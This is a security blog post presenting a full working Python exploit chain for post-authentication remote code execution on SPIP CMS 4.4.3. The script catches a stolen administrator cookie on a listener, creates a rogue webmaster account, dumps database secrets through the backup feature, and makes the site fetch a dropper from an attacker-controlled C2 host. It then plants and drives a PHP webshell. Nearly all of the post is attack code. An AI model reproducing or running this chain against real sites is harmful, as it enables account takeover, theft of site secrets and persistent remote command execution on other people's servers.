C110111: SPIP, Generic method to get RCE (post-auth)
Introduction
In the previous article, I explained how to achieve code execution on SPIP 4.1.16 using a generic exploitation method that leverages SPIP’s core functionality. I was curious to see whether this method could still be applied to the latest version (v4.4.3). To be honest, it turned out to be surprisingly simple as it required almost no modifications to the existing exploit.
Exploit for version 4.4.3 (generic method for all versions)
As shown in the screenshots below, I didn’t need to modify the file env_gen.php, and exploit.py only required a few minor adjustments to make the exploit work on the latest version.
Which, once run, gives us the following result.
POC
File: exploit.py
# Pour ceux qui prennent plaisir à repackage les sploits pour 10 secondes de
# prestige sur Twitter, nous vous voyons !
import base64
import os
import random
import requests
import sqlite3
import string
import subprocess
import sys
from bs4 import BeautifulSoup
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, unquote
# Port on which this script listens to receive the administrator's cookie.
LISTENING_PORT = 1337
# URL to interact with the SPIP CMS.
SPIP_URL = sys.argv[1]
# Variable to manage script verbosity (this value should be greater than 1 to
# display certain messages).
DEBUG = 1
# This variable is used to proxify traffic to Burp when debug is enabled.
if DEBUG >= 1:
PROXIES = {"http": "http://127.0.0.1:1348"}
# Name of new administrator (random string).
NEW_ADMIN_NAME = "".join(random.choice(string.ascii_lowercase) for i in range(6))
# Name of backup (random string).
BACKUP_NAME = "".join(random.choice(string.ascii_lowercase) for i in range(7))
# IP on which the script is listening.
LISTENING_IP = "<YOUR_C2_IP>"
if DEBUG >= 1:
LISTENING_IP = "host.docker.internal"
# Webshell name (stage 1 is equivalent to a persistence).
STAGE_1_NAME = "webshell.php"
# URL of webshell.
STAGE_1_URL = f"http://{LISTENING_IP}/{STAGE_1_NAME}"
# Webshell creation.
with open(f"{STAGE_1_NAME}", "wb") as f:
f.write(b"<?php system($_POST['cmd']); ?>")
# Command to execute to test the stage_1.
STAGE_1_COMMAND = "id"
# Name of the dropper which is also a stage 0 (random string).
STAGE_0_NAME = "".join(random.choice(string.ascii_lowercase) for i in range(8))+".html"
# Dropper URL.
STAGE_0_URL = f"http://{LISTENING_IP}/{STAGE_0_NAME}"
# Dropper creation.
with open(f"{STAGE_0_NAME}", "wb") as f:
f.write(b'<html><?php $persistence=file_get_contents("')
f.write(STAGE_1_URL.encode())
f.write(b'");file_put_contents("')
f.write(STAGE_1_NAME.encode())
f.write(b'",$persistence);echo "DONE";?></html>')
# We retrieve information for the form (think of it as a complicated CSRF token).
def get_form_info(response):
formulaire_action_args = None
formulaire_action_sign = None
soup = BeautifulSoup(response, "html.parser")
for input in soup.find_all("input"):
if input.get("name") == "formulaire_action_args":
formulaire_action_args = input.get("value")
if input.get("name") == "formulaire_action_sign":
formulaire_action_sign = input.get("value")
# We search only for the first occurrence of the values.
if formulaire_action_args != None and formulaire_action_sign != None:
break
if formulaire_action_args == None or formulaire_action_sign == None:
print("[x] Unable to retrieve form values (formulaire_action_args).")
exit(-1)
print("[+] Form values retrieved (formulaire_action_args, formulaire_action_sign).")
if DEBUG > 1:
print(f"{' '*4}- formulaire_action_args: \"{formulaire_action_args}\"")
print(f"{' '*4}- formulaire_action_sign: \"{formulaire_action_sign}\"")
return formulaire_action_args, formulaire_action_sign
# This class simply stores the newly created user's information.
class Administrator:
nom = NEW_ADMIN_NAME
email = f"{NEW_ADMIN_NAME}@localdomain.localhost"
password = f"{NEW_ADMIN_NAME}123!"
# On re-authentication, the session is reused for the rest of the exploit.
session = requests.session()
# Class implementing exploitation techniques.
class Exploit():
# Function setting the various exploit parameters.
def __init__(self, url, administrator_cookie):
print("\n[*] Setting up the exploit ...")
self.url = url.strip("/")
self.administrator_cookie = administrator_cookie
self.new_administrator = Administrator()
if DEBUG:
print(f"{' '*4}- URL: {self.url}")
print(f"{' '*4}- Administrator's cookie: {self.administrator_cookie}")
# Function implementing the exploit.
def run(self):
print("\n[*] Start of the exploit ...")
# We begin by creating a new user.
print("\n[*] User creation ...")
new_url = f"{self.url}/ecrire/?exec=auteur_edit&new=oui"
new_cookies = {"spip_session": self.administrator_cookie}
r = requests.get(
url=new_url,
cookies=new_cookies,
proxies=PROXIES
)
formulaire_action_args, formulaire_action_sign = get_form_info(r.text)
# Once the form information has been obtained, we can attempt to add a
# user.
new_user = Administrator()
new_datas = {
"exec": "auteur_edit",
"new": "oui",
"formulaire_action": "editer_auteur",
"formulaire_action_args": formulaire_action_args,
"formulaire_action_sign": formulaire_action_sign,
"editer_auteur": "oui",
"id_auteur": "oui",
"nom": new_user.nom,
"email": new_user.email,
"statut": "0minirezo",
"webmestre": "oui",
"saisie_webmestre": 1,
"new_login": new_user.nom,
"new_pass": new_user.password,
"new_pass2": new_user.password
}
r = requests.post(url=new_url, data=new_datas, cookies=new_cookies,
proxies=PROXIES, allow_redirects=True
)
# Check that the user has been added.
# Check status code.
expected_status_code = 200
if r.status_code != expected_status_code:
print(f"[x] Unable to add a user (status_code not {expected_status_code}).")
exit(-1)
# Check that the user is present in the user list.
condition = 0
soup = BeautifulSoup(r.text, "html.parser")
for a in soup.find_all("a"):
if a.get("href") == f"mailto:{new_user.email}":
condition = 1
if not condition:
print("[x] Unable to add a user (unable to find new user in user list).")
exit(-1)
print("[+] New administrator added.")
if DEBUG:
print(f"{' '*4}- Username: {new_user.nom}")
print(f"{' '*4}- Password: {new_user.password}")
# Now we'll authenticate with our new administrator, which will result in
# the secret keys being backed up in the database (encrypted with our
# password).
print("\n[*] Authentication attempt ...")
new_url = f"{self.url}/spip.php?page=login&url={unquote(urlparse(self.url).path)}/ecrire/"
r = new_user.session.get(url=new_url, proxies=PROXIES, allow_redirects=True)
formulaire_action_args, formulaire_action_sign = get_form_info(r.text)
new_datas = {
"page": "login",
"url": f"{unquote(urlparse(self.url).path)}/ecrire/",
"formulaire_action": "login",
"formulaire_action_args": formulaire_action_args,
"formulaire_action_sign": formulaire_action_sign,
"var_login": new_user.nom,
"password": new_user.password
}
r = new_user.session.post(url=new_url, data=new_datas,
proxies=PROXIES, allow_redirects=True
)
# Check that the user has been authenticated.
# Check status code.
expected_status_code = 200
if r.status_code != expected_status_code:
print(f"[x] Unable to authenticate (status_code not {expected_status_code}).")
exit(-1)
# Check that the logout button is present (which means we're connected).
condition = 0
soup = BeautifulSoup(r.text, "html.parser")
for a in soup.find_all("a"):
if a.get("href") == f"{self.url}/ecrire/?exec=accueil&action=logout&logout=prive":
condition = 1
if not condition:
print("[x] Unable to authenticate (can't find the logout button).")
exit(-1)
print("[+] New administrator authenticated.")
# We now move on to the database backup so that we can extract the important
# information stored in it.
print(f"\n[*] Database backup attempt ...")
new_url = f"{self.url}/ecrire/?exec=sauvegarder"
r = new_user.session.get(url=new_url, proxies=PROXIES, allow_redirects=True)
formulaire_action_args, formulaire_action_sign = get_form_info(r.text)
new_datas = {
"var_ajax": "form",
"exec": "sauvegarder",
"formulaire_action": "sauvegarder",
"formulaire_action_args": formulaire_action_args,
"formulaire_action_sign": formulaire_action_sign,
"reinstall": "non",
"nom_sauvegarde": BACKUP_NAME,
"tables[]": ["spip_auteurs", "spip_meta"]
}
r = new_user.session.post(url=new_url, data=new_datas,
proxies=PROXIES, allow_redirects=False
)
expected_status_code = 200
if r.status_code != expected_status_code:
print(f"[x] Unable to perform backup (status_code not {expected_status_code}).")
exit(-1)
# As the backup is made up of several steps, each step must be executed
# in the right order.
condition = 0
soup = BeautifulSoup(r.text, "html.parser")
hrefs = []
for a in soup.find_all("a"):
hrefs.append(a.get("href"))
if len(hrefs) == 2:
condition = 1
if not condition:
print("[x] Unable to retrieve backup URL (can't find the download button).")
exit(-1)
new_url = hrefs[0]
r = new_user.session.get(url=new_url, proxies=PROXIES, allow_redirects=True)
new_url = f"{hrefs[0]}&step=1"
r = new_user.session.get(url=new_url, proxies=PROXIES, allow_redirects=True)
new_url = f"{hrefs[0]}&step=2"
r = new_user.session.get(url=new_url, proxies=PROXIES, allow_redirects=True)
# Backup creation check.
new_url = f"{self.url}/ecrire/?exec=sauvegarder"
r = new_user.session.get(url=new_url, proxies=PROXIES, allow_redirects=True)
# We check that our backup is present in the list of backups and that a
# download button is associated with it.
condition = 0
soup = BeautifulSoup(r.text, "html.parser")
for a in soup.find_all("a"):
if a.get("href").find(BACKUP_NAME) != -1:
backup_url = a.get("href")
condition = 1
if not condition:
print("[x] Unable to retrieve backup URL (can't find the download button).")
exit(-1)
print("[+] Backup performed.")
if DEBUG:
print(f"{' '*4}- Backup name: {BACKUP_NAME}")
print(f"{' '*4}- URL: {backup_url}")
# Once the backup has been created, we download it.
print("\n[*] Downloading backup ...")
backup_filename = ""
with new_user.session.get(url=backup_url, proxies=PROXIES, allow_redirects=False, stream=True) as r:
r.raise_for_status()
backup_filename = r.headers["Content-Disposition"].split('"')[1]
with open(backup_filename, "wb") as f:
for chunk in r.iter_content(chunk_size=1024):
f.write(chunk)
# Check that the backup is not empty.
if len(backup_filename) == 0 or os.path.getsize(backup_filename) < 0:
print("[x] Backup is empty (size = 0).")
exit(-1)
print(f"[+] Backup downloaded.")
if DEBUG:
print(f"{' '*4}- Filename: {backup_filename}")
# Backdoor upload (stage 0).
# This has been done in several steps.
print(f"\n[*] Backdoor upload (stage 0) ...")
new_url = f"{self.url}/ecrire/?exec=documents"
r = new_user.session.get(url=new_url, proxies=PROXIES, allow_redirects=True)
formulaire_action_args, formulaire_action_sign = get_form_info(r.text)
# First we add a remote link.
new_datas = {
"var_ajax": "form",
"exec": "documents",
"formulaire_action": "joindre_document",
"formulaire_action_args": formulaire_action_args,
"formulaire_action_sign": formulaire_action_sign,
"bigup_retrouver_fichiers": 1,
"methode_focus": "distant",
"url": STAGE_0_URL,
"joindre_distant": "Choisir"
}
r = new_user.session.post(url=new_url, data=new_datas,
proxies=PROXIES, allow_redirects=False
)
# Then search for the added link in the list of documents ().
r = new_user.session.get(url=new_url, proxies=PROXIES, allow_redirects=True)
edit_link = ""
soup = BeautifulSoup(r.text, "html.parser")
for a in soup.find_all("a"):
if a.get("href").find("exec=document_edit") != -1:
possible_edit_link = a.get("href")
rbis = new_user.session.get(url=possible_edit_link, proxies=PROXIES, allow_redirects=True)
if rbis.text.find(STAGE_0_URL) != -1:
edit_link = possible_edit_link
document_id = edit_link.split("=")[-1]
break
if edit_link == "":
print("[x] Unable to retrieve edit link (can't find the modify button).")
exit(-1)
if DEBUG:
print(f"{' '*4}- Edit link: {edit_link}")
print(f"{' '*4}- Document id: {document_id}")
# Once the editing link is found, browse the page to find the file editing
# parameters.
r = new_user.session.get(url=edit_link, proxies=PROXIES, allow_redirects=True)
formulaire_action_args, formulaire_action_sign = get_form_info(r.text)
# Then start a local copy of the remote file.
new_url = f"{self.url}/ecrire/?exec=document_edit"
new_datas = {
"var_ajax": "form",
"exec": "document_edit",
"formulaire_action": "editer_document",
"formulaire_action_args": formulaire_action_args,
"formulaire_action_sign": formulaire_action_sign,
"id_document": document_id,
"bigup_retrouver_fichiers": 1,
"copier_local": "Copier dans le site",
"methode_focus": "upload",
}
r = new_user.session.post(url=new_url, data=new_datas,
proxies=PROXIES, allow_redirects=True
)
expected_status_code = 200
if r.status_code != expected_status_code:
print(f"[x] File cannot be copied locally (status_code not {expected_status_code}).")
exit(-1)
# Once the file has been copied locally, we try to find its name (which
# is not the same as the specified file).
new_url = f"{self.url}/ecrire/?exec=documents"
r = new_user.session.get(url=new_url, proxies=PROXIES, allow_redirects=True)
file_to_evaluate = ""
soup = BeautifulSoup(r.text, "html.parser")
for div in soup.find_all("div"):
try:
if div.get("title").find(STAGE_0_NAME.split(".")[0]) != -1:
file_to_evaluate = div.get("title")
break
except:
pass
if file_to_evaluate == "":
print("[x] Unable to retrieve file to evaluate (can't find div title).")
exit(-1)
if DEBUG:
print(f"{' '*4}- File to evaluate: {file_to_evaluate}")
# Retrieving secrets stored in the database.
print("\n[*] Extraction of secrets ...")
user_backup_cles, meta_secret_du_site = "", ""
con = sqlite3.connect(backup_filename)
cur = con.cursor()
user_backup_cles = cur.execute(f"SELECT backup_cles FROM spip_auteurs WHERE login='{NEW_ADMIN_NAME}';").fetchall()[0][0]
meta_secret_du_site = cur.execute(f"SELECT valeur FROM spip_meta WHERE nom='secret_du_site';").fetchall()[0][0]
if user_backup_cles == "" or meta_secret_du_site == "":
print("[x] Extraction failed.")
exit(-1)
print(f"[+] Extraction succeeded.")
if DEBUG:
print(f"{' '*4}- USER_BACKUP_CLES: {user_backup_cles}")
print(f"{' '*4}- META_SECRET_DU_SITE: {meta_secret_du_site}")
# Generation of a malicious payload to evaluate a dropper (stage 0) in
# HTML format as if it were a PHP file.
print("\n[*] Payload generation ...")
evaluated_file = file_to_evaluate.split(".")[0]
if DEBUG:
print(f"{' '*4}- Backdoor's filename: {evaluated_file}")
p = subprocess.Popen(
[
"php",
"env_gen.php",
new_user.password,
user_backup_cles,
meta_secret_du_site,
evaluated_file
],
stdout=subprocess.PIPE)
payload = p.communicate()[0].decode()
if DEBUG:
print(f"{' '*4}- Payload: {payload}")
# Evaluation of the HTML file (as PHP).
print("\n[*] Evaluation of the uploaded file (RCE) ...")
new_url = f"{self.url}/"
new_datas = {
"var_ajax": "1",
"var_ajax_env": payload
}
r = new_user.session.post(url=new_url, data=new_datas,
proxies=PROXIES, allow_redirects=False
)
if r.text.find("DONE") == -1:
print("[x] Exploit failed.")
exit(-1)
print(f"[+] Exploit succeeded.")
# Attempt to interact with webshell.
print("\n[*] Attempt to interact with webshell ...")
print("[+] Output:")
new_url = f"{self.url}/webshell.php"
new_datas = {
"cmd": STAGE_1_COMMAND,
}
r = new_user.session.post(url=new_url, data=new_datas,
proxies=PROXIES, allow_redirects=False
)
print(r.text)
# Little clean-up on the C2.
for file in [STAGE_1_NAME, STAGE_0_NAME, backup_filename]:
os.remove(file)
# Last warning before bedtime.
print("\n[!] Remember to clean up after yourself (user creation, database backup, uploaded file, etc.)")
exit(0)
# This class retrieves an administrator's cookie and automatically continues the
# exploitation chain (up to the upload of a backdoor).
class CustomServerClass(BaseHTTPRequestHandler):
def _set_response(self):
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
def do_GET(self):
self._set_response()
self.wfile.write("cheh".encode())
query = urlparse(self.path).query
try:
params = query.split("&")
except:
params = [query]
for param in params:
if param.find("cookie") != -1 and param != "cookie=":
# As the cookie is received in an encoded way (base64), we decode
# it and extract only the useful part to be able to replay it.
cookie = base64.b64decode(unquote(param.split("=")[1]).encode()).decode().split("=")[1].rstrip(";")
print(f"[+] Cookie captured (cookie: {cookie})")
# Launch of the exploit.
Exploit(SPIP_URL, cookie).run()
def run(server_class=HTTPServer, handler_class=CustomServerClass, port=LISTENING_PORT):
httpd = server_class(("", port), handler_class)
print(f"[*] Starting httpd (on port {port})...")
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
print("[*] Stopping httpd ...")
if __name__ == "__main__":
run()